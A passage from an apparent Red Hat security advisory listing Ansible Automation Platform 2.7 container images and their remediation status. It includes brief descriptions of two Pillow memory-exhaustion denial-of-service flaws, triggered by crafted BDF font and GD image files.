| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64 | — |
Workaround
|
A flaw was found in Pillow, a Python imaging library. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by providing a specially crafted BDF font file. The library's image processing function fails to properly validate dimensions from the font file, bypassing a critical security check designed to prevent excessive memory usage. This oversight can lead to the system consuming an unreasonable amount of memory, making it unavailable to legitimate users.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64 | — |
Workaround
|
A flaw was found in Pillow, a Python imaging library. A remote attacker could exploit this vulnerability by providing a specially crafted GD 2.x image file. The GdImageFile._open() function reads image dimensions without proper validation, leading to excessive memory allocation. This can result in a Denial of Service (DoS) due to C-heap exhaustion.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64 | — |
Vendor Fix
fix
Workaround
|
|
